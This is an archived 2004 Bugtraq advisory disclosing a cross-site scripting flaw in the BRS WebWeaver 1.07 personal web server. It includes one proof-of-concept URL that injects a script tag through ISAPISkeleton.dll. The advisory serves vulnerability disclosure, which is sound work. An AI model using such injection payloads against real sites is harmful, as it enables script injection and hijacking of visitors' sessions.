BRS WebWeaver Webserver Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: BRS WebWeaver Webserver Cross Site Scripting Vulnerability
From: Oliver Karow <oliver.karow@xxxxxx>
Date: Wed, 28 Jan 2004 12:34:45 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031013 Thunderbird/0.3

BRS WebWeaver Webserver Cross Site Scripting Vulnerability
================================================

Whatis:
=====

BRS WebWeaver is a free personal web server that runs on the Windowsplatform.


Version:
======

V 1.07

Exploiting:
=======

http://127.0.0.1/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script>

Vendor:
======

http://www.brswebweaver.com

Credit:
=====

www.oliverkarow.de

Prev by Date: ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files retrieving
Next by Date: SGI Advanced Linux Environment security update #9
Previous by thread: ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files retrieving
Next by thread: SGI Advanced Linux Environment security update #9
Index(es):
- Date
- Thread